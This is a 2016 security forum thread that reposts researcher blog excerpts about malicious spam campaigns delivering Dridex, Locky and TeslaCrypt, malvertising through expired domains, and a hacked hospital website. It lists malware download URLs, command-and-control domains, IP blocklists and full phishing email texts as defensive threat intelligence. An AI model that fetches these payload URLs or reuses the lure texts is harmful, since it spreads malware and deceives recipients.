Mar 16, 2016 - "Expired domain names are becoming the latest route for cyber criminals to find their way into the computers of unsuspecting users. Cyber criminals launched a malicious advertising campaign this week targeting visitors of popular news and entertainment websites after gaining ownership of an expired web domain of an advertising company. Users visiting the websites of the New York Times, Newsweek, BBC and AOL, among others, may have installed malware on their computers if they clicked on the malicious ads. Bresntsmedia .com, the website used by -hacks- to serve up malware, expired on Jan. 1 and was registered again on March 6 by a different buyer, security researchers at Trustwave SpiderLabs wrote in a blog*. Buying the domain of a small but legitimate ad company provided the criminals with high quality traffic from popular web sites that publish their ads directly, or as affiliates of other ad networks, the researchers said... The researchers also found two more expired "media"-related domains - envangmedia .com and markets.shangjiamedia .com - used by the same cyber criminals. The people behind the campaign may be on keeping a watch for expired domains with the word "media" in them, they said."
* https://www.trustwav...to-New-Heights/

envangmedia .com: 136.243.149.196: https://www.virustot...96/information/
>> https://www.virustot...e221a/analysis/

markets.shangjiamedia .com: 136.243.149.201: https://www.virustot...01/information/
>> https://www.virustot...5b055/analysis/
 

 

Edited by AplusWebMaster, 16 March 2016 - 07:30 PM.

[AplusWebMaster]

FYI...

Fake 'Interparcel Documents' SPAM - malicious attachment
- http://blog.dynamoo....-documents.html
17 Mar 2016 - "This spam email does not come from Interparcel but is instead a simple forgery with a malicious attachment:
    From:    Interparcel [bounce@ interparcel .com]
    Date:    17 March 2016 at 08:51
    Subject:    Interparcel Documents
    Your Interparcel collection has been booked and your documents are ready.
    There is a document attached to this email called Shipping Labels (620486055838).doc.
    Please open and print this attachment and cut out the waybill images. They must be attached to your parcels before the driver arrives.
    Thank you for booking with Interparcel.

Attached is a randomly-named document that matches the reference in the email (e.g. Shipping Labels (620486055838).doc) of which I have seen two variants (VirusTotal results [1] [2]). These two Malwr reports [3] [4] show Dridex-like download locations at:
gooddrink .com.tr/wp-content/plugins/hello123/56h4g3b5yh.exe
ziguinchor.caravanedesdixmots .com/wp-content/plugins/hello123/56h4g3b5yh.exe
The detection rate for the binary is 5/57*. This DeepViz report** on the binary shows network connections to:
195.169.147.26 (Culturegrid.nl, Netherlands)
64.76.19.251 (Level 3, US / Impsat, Argentina)
91.236.4.234 (FHU Climax Rafal Kraj, Poland)
188.40.224.78 (Hetzner / NoTaG Community, Germany)
As mentioned before, these characteristics look like the Dridex banking trojan.
Recommended blocklist:
195.169.147.26
64.76.19.251
91.236.4.234
188.40.224.78 "
1] https://www.virustot...sis/1458205307/

2] https://www.virustot...sis/1458205319/

3] https://malwr.com/an...DBhYTAzNDdlZTM/
Hosts
185.85.191.251

4] https://malwr.com/an...jllNjU1MzM1NzY/
Hosts
62.210.16.61

* https://www.virustot...sis/1458206236/

** https://sandbox.deep...6ee5d6ec6746d8/

- https://myonlinesecu...eads-to-dridex/
17 Mar 2016 - "An email with the subject of 'Interparcel Documents' pretending to come from Interparcel <bounce@ interparcel .com> with a malicious word doc attachment is another one from the current bot runs... The email looks like:
From: Interparcel <bounce@ interparcel .com>
Date: none
Subject:  Interparcel Documents
Attachment: Shipping Labels (642079569307).doc
    Your Interparcel collection has been booked and your documents are ready.
    There is a document attached to this email called Shipping Labels (642079569307).doc.
    Please open and print this attachment and cut out the waybill images. They must be attached to your parcels before the driver arrives.
    Thank you for booking with Interparcel.

17 March 2016: Shipping Labels (642079569307).doc - Current Virus total detections 8/57*
.. MALWR** shows a download from http ://www.corecircle .it/wp-content/plugins/hello123/56h4g3b5yh.exe (VirusTotal ***) This is likely to be the Dridex banking Trojan. Hybrid Analysis[4]... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458204597/

** https://malwr.com/an...jVhNTYzNDg4NGE/
Hosts
62.149.142.224

*** https://www.virustot...sis/1458205050/

4] https://www.hybrid-a...environmentId=4
Host Addresses
195.169.147.26
64.76.19.251
___

Fake 'Remittance Adivce' SPAM - doc malware leads to Dridex
- https://myonlinesecu...eads-to-dridex/
17 Mar 2016 - "An email with the subject of' Remittance Adivce' pretending to come from random names and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... Note the -misspelling- in the subject 'Remittance Adivce' instead of 'Remittance Advice' which should be enough to raise warning flags. One of the emails looks like:
From: Gill.Wilmer07@ urbanmountainhomes .com
Date: Thu 17/03/2016 09:16
Subject: Remittance Adivce
Attachment: remitadv_ana.doc
Please find attached a remittance advice for payment made yo you today.
Please contact the accounts team on 020 7523 2565 or via reply email for any queries regarding this payment.
Kind Regards
Wilmer Gill

17 March 2016: remitadv_ana.doc - Current Virus total detections 1/57*
.. MALWR** shows a download from http ://bakery.woodwardcounseling .com/michigan/map.php which gave me crypted120med.exe (virustotal 3/56***) MALWR[4] which looks like Dridex banking Trojan... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458206097/

** https://malwr.com/an...zA3NGM5YjUwY2M/
Hosts
217.12.199.94
188.93.239.28

*** https://www.virustot...sis/1458204974/
TCP connections
38.64.199.33
104.86.111.136

4] https://malwr.com/an...2E1ZWQyMzJlMjA/
Hosts
188.93.239.28

- http://blog.dynamoo....divce-from.html
17 Mar 2016 - "This fake financial spam has a malicious attachment and poor spelling in the subject field.
    From:    Booth.Garth19@ idsbangladesh .net.bd
    Date:    17 March 2016 at 09:17
    Subject:    Remittance Adivce
    Please find attached a remittance advice for payment made yo you today.
    Please contact the accounts team on 020 2286 7847 or via reply email for any queries regarding this payment.
    Kind Regards
    Garth Booth

... Recommended blocklist:
217.12.199.94
38.64.199.33
188.93.239.28
85.17.155.148 "
___

Fake 'Documentxx' SPAM - leads to Locky
- http://blog.dynamoo....apparently.html
17 Mar 2016 - "This spam appears to come from-the-victim, but this is just a simple forgery (explained here*). Attached is a ZIP file beginning "Document" followed by a one or two digit random number, which matches the subject. There is -no- body text. Here is an example:
    From:    victim@ domain .tld
    To:    victim@ domain .tld
    Date:    17 March 2016 at 10:37
    Subject:    Document32

* http://blog.dynamoo....yself-spam.html
Inside is a randomly-named script (samples VirusTotal reports [1] [2]..). These Malwr reports [8] [9].. indicate that the -script- attempts to download a binary from the following locations:
escortbayan.xelionphonesystem .com/wp-content/plugins/hello123/89h8btyfde445.exe
fmfgrzebel .pl/wp-content/plugins/hello123/89h8btyfde445.exe
superiorelectricmotors .com/wp-content/plugins/hello123/89h8btyfde445.exe
sabriduman .com/wp-content/plugins/hello123/89h8btyfde445.exe
bezerraeassociados .com.br/wp-content/plugins/hello123/89h8btyfde445.exe
The dropped binary has a detection rate of just 2/57**. Those reports and these other automated analyses [14] [15].. show network traffic to:
78.40.108.39 (PS Internet Company LLC, Kazakhstan)
46.148.20.46 (Infium UAB, Ukraine)
188.127.231.116 (SmartApe, Russia)
195.64.154.114 (Ukrainian Internet Names Center, Ukraine)
This is Locky ransomware.
Recommended blocklist:
78.40.108.39
46.148.20.46
188.127.231.116
195.64.154.114 "
1] https://www.virustot...sis/1458212406/

2] https://www.virustot...sis/1458212403/

8] https://malwr.com/an...Tg3MTBkODYzNTE/

9] https://malwr.com/an...WE4YWQyMmQwNGU/

** https://www.virustot...sis/1458213349/

14] https://malwr.com/an...TdiNTczMDNjZDE/

15] https://www.hybrid-a...environmentId=4
___

Fake 'PDFPart2.pdf' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
17 Mar 2016 - "An email with the subject of 'PDFPart2.pdf' pretending to come from Administrator admin@ your-own-email domain with a zip attachment is another one from the current bot runs which downloads Locky ransomware... The -broken- email looks like:
From: Administrator  admin@ your own email domain
Date: Thu 17/03/2016 12:34
Subject: PDFPart2.pdf
Attachment: PDFPart2.zip
—-_com.android.email_2732400748040
Content-Type: multipart/alternative; boundary=”–_com.android.email_2732400748040″
—-_com.android.email_2732400748040 ...
.. When it is fixed...
From: Administrator  admin@ your own email domain
Date: Thu 17/03/2016 12:34
Subject: PDFPart2.pdf
Attachment: PDFPart2.zip
    Sent from my Samsung Galaxy Note 4 – powered by Three

17 March 2016: PDFPart2.zip: Extracts to: MNS2053291109.js - Current Virus total detections 6/57*
.. MALWR** shows a download of Locky ransomware from
  http ://www.tuttiesauriti .org/wp-content/plugins/hello123/89h8btyfde445.exe (VirusTotal 5/56***) which although the same file name as today’s earlier locky malspam run is a -different- binary.. A second version CHR5185491610.js (VirusTotal [4]).. MALWR shows a download of the -same- Locky ransomware from
 http ://cepteknik .org/wp-content/plugins/hello123/89h8btyfde445.exe ... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458220341/

** https://malwr.com/an...WYxYWVhNThhY2E/
Hosts
62.149.140.49: https://www.virustot...49/information/
78.40.108.39

*** https://www.virustot...sis/1458220984/
TCP connections
78.40.108.39: https://www.virustot...39/information/
>> https://www.virustot...0a495/analysis/

4] https://www.virustot...sis/1458221038/

- http://blog.dynamoo....nt-from-my.html
17 Mar 2016 - "This spam run has a malicious attachment. It appears to come from within the user's own domain.
    From:    Administrator [admin@ victimdomain .tld]
    Date:    17 March 2016 at 12:54
    Subject:    PDFPart2.pdf
    Sent from my Samsung Galaxy Note 4 - powered by Three
    Sent from my Samsung Galaxy Note 4 - powered by Three

All the attachments that I saw were corrupt, but it appears to be trying to download a -script- that installs Locky ransomware..."
___

Fake 'Invoice' SPAM - RTF malware leads to Dridex
- https://myonlinesecu...eads-to-dridex/
17 Mar 2016 - "An email with the subject of 'Invoice DOINV32142' from Tip Top Delivery (random characters) pretending to come from random email addresses with a malicious word doc RTF attachment is another one from the current bot runs...

Screenshot: https://myonlinesecu...ce-1024x783.png

17 March 2016: Invoice_DOINV32142_from_tip_top_delivery.rtf - Current Virus total detections 3/57*
.. MALWR** shows a download of what looks like Dridex banking Trojan from
 http ://parts.woodwardcounselinginc .com/michigan/map.php which gave me twitt_us.exe (VirusTotal 3/57***).
It looks like a continuation of this earlier Dridex malspam[1] with similar sites... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458235091/

** https://malwr.com/an...WIyNWIwYTgzN2M/
Hosts
176.107.177.85
188.93.239.28
8.254.249.62

*** https://www.virustot...sis/1458235750/
TCP connections
188.93.239.28
104.86.111.136

1] https://myonlinesecu...eads-to-dridex/
 

  

Edited by AplusWebMaster, 17 March 2016 - 02:12 PM.

[AplusWebMaster]

FYI...

Teslacrypt SPAM: 'Unpaid Issue…'
- https://blog.malware...n-unpaid-issue/
Mar 18, 2016 - "We have all seen the current upsurge in Ransomware attacks. It has been covered on an international scale, with new variants appearing at a very fast pace, some target Windows, some target Macs and some have cross platform capabilities... The email seen below is an example how the orchestrated attack is carried out (thanks to Conrad Longmore* for the email example):
From: Jennie bowles
Date: 10 March 2016 at 12:27
Subject: GreenLand Consulting – Unpaid Issue No. 58833
Dear Client! For the third time we are reminding you about your unpaid debt. You used to ask for our advisory services in July 2015, the receipt issued to you was recognized in our database with No. 58833. But it has never been paid off. We enclose the detailed bill for your recollection and sincerely hope that you will act nobly and responsibly. Otherwise we will have to start a legal action against you.
Respectfully,
Jennie bowles
Chief Accountant
707 Monroe St FL 58833 928-429-4994
The emails usually contain a ZIP file which contains a malicious script/downloader. Upon running this specific malicious script/downloader I was greeted by Teslacrypt ransomware (69.exe) from:
 hellomississmithqq[.]com /
IP: 54.212.162.6: https://www.virustot....6/information/
>> https://www.virustot...2a41e/analysis/
... below are some of the associated domains / IPs identified from the above sample. This Teslacrypt ransomware campaign has recently morphed into a hybrid Teslacrypt/Locky ransomware campaign. The aforementioned domain hellomississmithqq[.]com was seen serving up both Teslacrypt and Locky Ransomware on 10 March 2016).
Identified command and control:
multibrandphone[.]com
vtechshop[.]net
sappmtraining[.]com
shirongfeng[.]cn
controlfreaknetworks[.]com
tele-channel[.]com
Associated IP addresses with hellomississmithqq[.]com:
46.108.108.182
54.212.162.6
78.135.108.94
134.19.180.8
202.120.42.190
216.150.77.21
142.25.97.48
202.120.42.190
... Ransomware is not going away, on the contrary it is becoming more and more prevalent with new variants coming out at a fast pace and targeting multiple platforms. It is recommended that users are using anti-malware protection, especially one that has a website protection option..."
* http://blog.dynamoo.com/
___

Evil networks to block 2016-03-18
- http://blog.dynamoo....2016-03-18.html
18 Mar 2016 - "A follow-up to this list* posted a few days ago. These networks are primarily distributing Angler and in my opinion you should -block- their entire ranges to be on the safe side...
85.204.74.0/24
89.45.67.0/24
89.108.83.0/24
148.251.249.96/28
184.154.89.128/29
184.154.135.120/29
185.30.98.0/23
185.117.73.0/24
185.141.25.0/24
194.1.237.0/24
212.22.85.0/24
217.12.210.128/25 "
* http://blog.dynamoo....2016-03-07.html
___

Fake 'Proof of Delivery' SPAM - doc macro malware leads to Dridex
- https://myonlinesecu...eads-to-dridex/
18 Mar 2016 - "An email with the subject of 'Proof of Delivery Report: 16/03/16-17/03/16' pretending to come from UKMail Customer Services <list_reportservices@ ukmail .com> with a malicious word doc or Excel XLS spreadsheet attachment  is another one from the current bot runs...

Screenshot: https://myonlinesecu...31-1024x763.png

18 March 2016: poddel-pdf-2016031802464600.docm - Current Virus total detections 9/57*
.. MALWR** shows a download from http ://felipemachado .com/wp-content/plugins/hello123/r34t4g33.exe
(VirusTotal 9/57***) which looks like Dridex banking Trojan... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458295346/

** https://malwr.com/an...WQ4YzJjMWNiNzc/
Hosts
93.104.215.155
64.147.192.68
184.25.56.51

*** https://www.virustot...sis/1458295346/

- http://blog.dynamoo....ery-report.html
18 Mar 2016 - "This spam does not come from UKMail but is instead a simple -forgery- with a malicious attachment:
    From:    UKMail Customer Services [list_reportservices@ ukmail.com]
    Date:    18 March 2016 at 02:46
    Subject:    Proof of Delivery Report: 16/03/16-17/03/16
    Dear Customer,
    Please find attached your requested Proof of Delivery (POD) Download Report
    ATTACHED FILE: POD DOWNLOAD ...

At the time of writing I have seen just a single sample with an attachment named poddel-pdf-2016031802464600.docm ...
Recommended blocklist:
64.147.192.68
64.76.19.251
91.236.4.234
188.40.224.78 "
___

Fake 'Attached Image' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
18 Mar 2016 - "A -blank- email with the subject of 'Attached Image' pretending to come from a scanner, copier or multi-functional device at your-own-domain with a random numbered zip attachment is another one from the current bot runs which downloads Locky ransomware... The email looks like:
From: scanner or copier at your-own-email domain
Date: Fri 18/03/2016 10:24
Subject: Attached Image pretending to come from a scanner or copier at your own domain
Attachment: 9369_001.zip (all random numbers)

Body content: totally blank

5 March 2016: 9369_001.zip : Extracts to: AGK4044783108.js - Current Virus total detections 2/57*
.. MALWR** shows a download of Locky ransomware from
 http ://naairah .com/wp-content/plugins/hello123/j7u7h54h5.exe (VirusTotal 2/55***)  
.. MALWR[4] and from http ://robyrogers .com.au/wp-content/plugins/hello123/8888ytc6r.exe (VirusTotal 4/57[5])... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458300821/

** https://www.virustot...sis/1458300821/
Hosts
149.202.201.228
46.148.20.46
27.131.66.9
195.154.126.159

*** https://www.virustot...sis/1458301083/
TCP connections
46.148.20.46

4] https://malwr.com/an...mY0MWQ5NjkzMzg/
Hosts
185.82.216.143

5] https://www.virustot...sis/1458301375/
___

Fake 'FedEx' SPAM - JS malware leads to ransomware
- https://myonlinesecu...-to-ransomware/
18 Mar 2016 - "An email with the subject of 'FedEx_00196222.zip' pretending to come from  mogotoys@ server.robo-apps .com; on behalf of; FedEx 2Day <shawn.maddox@ mogotoys .com> with a zip attachment is another one from the current bot runs which downloads ransomware... The email looks like:
From: mogotoys@ server.robo-apps .com; on behalf of; FedEx 2Day <shawn.maddox@ mogotoys .com>
Date: Fri 18/03/2016 02:49
Subject: Problems with item delivery, n.00196222
Attachment: FedEx_00196222.zip
    Dear Customer,
    Your parcel has arrived at March 15. Courier was unable to deliver the parcel to you.
    Shipment Label is attached to email.
    Yours sincerely,
    Shawn Maddox,
    Sr. Station Agent.

18 March 2016: FedEx_00196222.zip: Extracts to: FedEx_00196222.doc.js - Current Virus total detections 12/57*
.. Wepawet** shows downloads from a combination of  of these -5- locations:
evakuator-lska .com.ua | rpexpress .qc.ca | omergoksel .com | web.benzol .net.pl | cspfc.immo .perso.sf
.. Hybrid analysis*** shows the download location to be
 evakuator-lska .com.ua where it gave -2- files VirusTotal [1][2] which look like Kovter and Boaxxe...
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458279168/

** https://wepawet.isec...eef4046&type=js

*** https://www.reverse....environmentId=1
Contacted Hosts
78.109.16.100
28.59.23.77
47.206.106.113
145.24.135.107
178.33.69.66
87.118.110.192
189.60.150.37
28.29.231.118
DNS Requests
evakuator-lska .com.ua: 78.109.16.100: https://www.virustot...00/information/
>> https://www.virustot...64c5c/analysis/
find-dentalimplants .com: 173.201.146.128: https://www.virustot...28/information/
>> https://www.virustot...76076/analysis/

1] https://www.virustot...sis/1458249226/

2] https://www.virustot...sis/1458282807/
 

  

Edited by AplusWebMaster, 18 March 2016 - 10:58 AM.

[AplusWebMaster]

FYI...

Fake 'Fax transmission' SPAM - malicious script attachment
- http://blog.dynamoo....ervice-fax.html
21 Mar 2016 - "This -fake- fax spam appears to come from within the victim's own domain, but it doesn't. Instead is is just a simple -forgery- with a malicious attachment.
    From:    FX Service [emailsend@ w.e191.victimdomain .tld]
    Date:    21 March 2016 at 14:32
    Subject:    Fax transmission: -7172277033-1974602246-2016032111285-47417.tiff
    Please find attached to this email a facsimile transmission we
    have just received on your behalf
    (Do not reply to this email as any reply will not be read by
    a real person)

Details will vary from message to message. Attached s a ZIP file with a name that broadly matches the one referred to in the subject (e.g. F-7172277033-1974602246-2016032111285-47417.zip) which contains any one of a wide-number-of-malicious-scripts (some example VirusTotal results [1] [2]..). Malwr analysis of those samples [6] [7].. shows binary download locations at:
http ://modaeli .com/89h766b.exe
http ://spormixariza .com/89h766b.exe
http ://sebastiansanni .org/wp-content/plugins/hello123/89h766b.exe
http ://cideac .mx/wp-content/plugins/hello123/89h766b.exe
There are probably other download locations too. The dropped binary has a VirusTotal detection rate of just 2/56*. This Malwr report** of the payload indicates that it is Locky ransomware.
All of those sources plus this Deepviz report*** show network traffic to the following IPs:
195.64.154.126 (Ukrainian Internet Names Center, Ukraine)
92.63.87.106 (MWTV, Latvia)
84.19.170.244 (Keyweb AG, Germany / 300GB.ru, Russia)
217.12.199.90 (ITL Company, Ukraine) ...
Recommended blocklist:
195.64.154.126
92.63.87.106
84.19.170.244
217.12.199.90 "
1] https://www.virustot...9f7a3/analysis/

2] https://www.virustot...83fc1/analysis/

6] https://malwr.com/an...WVkOTE4YjdiYWY/

7] https://malwr.com/an...WFjYzNmYzg3NmU/

* https://www.virustot...sis/1458575289/

** https://malwr.com/an...2I5NTJiYjg4MGY/

*** https://sandbox.deep...d352ae1d944c2a/
___

Fake 'Your account ID... has been suspended' SPAM - JS malware leads to Teslacrypt
- https://myonlinesecu...-to-teslacrypt/
21 Mar 2016 - "An email with the subject of 'Your account ID:98938 has been suspended' [random numbered] coming from random names and email addresses with a zip attachment is another one from the current bot runs which downloads teslacrypt... The email looks like:
From: random email addresses
Date: Beatriz gepp <geppBeatriz957@ jjdior .com>
Subject:  Your account ID:98938 has been suspended.
Attachment: warning_letter_34692556.zip
    Your bank account associated with the ID:98938 has been suspended because of the unusual activity connected to this account and a failure of the account holder to pay the taxes on a due date.
    Your debt: - 394,42 USD
    For more details and the information on how to unlock your account please refer to the document attached.

21 March 2016: warning_letter_34692556.zip: Extracts to: letter_I22vNL.js - Current Virus total detections 15/56*
.. MALWR** shows a download of teslacrypt from http ://grandmahereqq .com/80.exe?1 (VirusTotal ***)
Note: this also tries to download http ://google .com/80.exe?1 which does-not-exist... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458579387/

** https://malwr.com/an...GJmYzlkZjVmNGQ/
Hosts
54.212.162.6
216.58.192.14

*** https://www.virustot...sis/1458581354/
___

Hacked Canadian Hospital Website serves Ransomware
- https://blog.malware...hacked-website/
Mar 21, 2016 - "... Norfolk General Hospital, based in Ontario, became a teaching facility for McMaster University’s Faculty of Health Sciences in 2009. The web portal is powered by the Joomla CMS, running version 2.5.6 (latest version is 3.4.8) according to a manifest file present on their server. Several vulnerabilities exist for this outdated installation, which could explain why the site has been hacked. Our honeypots visited the hospital page and got infected with ransomware via the Angler exploit kit. A closer look at the packet capture revealed that malicious-code leading to the exploit kit was -injected- directly into the site’s source code itself. Like many site hacks, this injection is conditional and will appear only -once- for a particular IP address. For instance, the site administrator who often visits the page will only see a clean version of it, while first timers will get served the exploit and malware:
> https://blog.malware...016/03/Flow.png
The particular strain of ransomware dropped here is -TeslaCrypt- which demands $500 to recover your personal files it has encrypted. That payment doubles after a week... We contacted the Norfolk hospital and eventually were able to speak with their IT staff. We shared the information we had (screenshots, network packet capture) and told them about the ransomware payload we collected when we reproduced the attack in our lab. We were told that they were working on upgrading their version of Joomla with their hosting provider..."

Norfolk General Hospital - Ontario: ngh.on .ca: 205.150.58.124:
>> https://www.virustot...43773/analysis/
 

  

Edited by AplusWebMaster, 21 March 2016 - 01:04 PM.